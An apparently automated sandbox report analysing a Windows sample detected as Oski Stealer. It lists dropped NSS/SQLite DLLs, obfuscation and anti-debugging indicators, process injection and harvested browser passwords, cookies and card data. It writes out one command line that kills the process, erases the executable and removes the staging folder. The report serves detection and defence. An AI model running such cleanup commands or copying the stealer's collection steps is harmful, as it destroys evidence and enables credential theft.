Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_004040FF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004040FF
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.1.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_01
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source: Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source: Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source: Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F301B0F push ss; iretd 0_2_6F301B1C
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30B920 push edx; ret 0_2_6F30B921
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F30B98E push ecx; retf 0000h 0_2_6F30B98F
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F3380F5 push ecx; ret 0_2_6F338108
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B8C65 push ecx; ret 1_2_007B8C78
PE file contains sections with non-standard names
Source: sqlite3.dll.1.dr Static PE information: section name: /4
Source: sqlite3.dll.1.dr Static PE information: section name: /19
Source: sqlite3.dll.1.dr Static PE information: section name: /35
Source: sqlite3.dll.1.dr Static PE information: section name: /51
Source: sqlite3.dll.1.dr Static PE information: section name: /63
Source: sqlite3.dll.1.dr Static PE information: section name: /77
Source: sqlite3.dll.1.dr Static PE information: section name: /89
Source: sqlite3.dll.1.dr Static PE information: section name: /102
Source: sqlite3.dll.1.dr Static PE information: section name: /113
Source: sqlite3.dll.1.dr Static PE information: section name: /124
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405C2D

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon (68).png
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33727E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6F33727E
Source: C:\Users\user\Desktop\gunzipped.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\gunzipped.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CB4E0 GetSystemInfo, 1_2_007CB4E0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405C06 FindFirstFileA,FindClose, 0_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00402630 FindFirstFileA, 0_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00405C06 FindFirstFileA,FindClose, 1_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00402630 FindFirstFileA, 1_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 1_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson, 1_2_007B43DF
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose, 1_2_007D0540
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 1_2_007CE640
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose, 1_2_007CD360
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CF6B0 FindFirstFileExW, 1_2_007CF6B0
Source: C:\Users\user\Desktop\gunzipped.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33B734 IsDebuggerPresent, 0_2_6F33B734
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33A967 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_6F33A967
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405C2D
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33744F GetProcessHeap, 0_2_6F33744F
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019EA30 mov eax, dword ptr fs:[00000030h] 0_2_0019EA30
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019E6EE mov eax, dword ptr fs:[00000030h] 0_2_0019E6EE
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019E902 mov eax, dword ptr fs:[00000030h] 0_2_0019E902
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019E9B3 mov eax, dword ptr fs:[00000030h] 0_2_0019E9B3
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_0019E9F2 mov eax, dword ptr fs:[00000030h] 0_2_0019E9F2
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007C96D0 mov eax, dword ptr fs:[00000030h] 1_2_007C96D0
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CB750 mov eax, dword ptr fs:[00000030h] 1_2_007CB750
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F337F7D SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6F337F7D
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B72E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_007B72E6
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007B4354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_007B4354
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007BE5C7 SetUnhandledExceptionFilter, 1_2_007BE5C7

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\gunzipped.exe Memory written: C:\Users\user\Desktop\gunzipped.exe base: 7B0000 value starts with: 4D5A Jump to behavior
Uses taskkill to terminate processes
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\gunzipped.exe Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe" Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068 Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\autofill\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\cc\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\outlook.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\screenshot.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ProgramData\834793065949733\system.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 1_2_007CAA60
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F33B9B4 cpuid 0_2_6F33B9B4
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\gunzipped.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_6F337ABA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_6F337ABA
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007BD6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 1_2_007BD6E2
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 0_2_00405931 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405931
Source: C:\Users\user\Desktop\gunzipped.exe Code function: 1_2_007CB1E0 GetUserNameA, 1_2_007CB1E0

Stealing of Sensitive Information:

Yara detected Oski Stealer
Source: Yara match File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
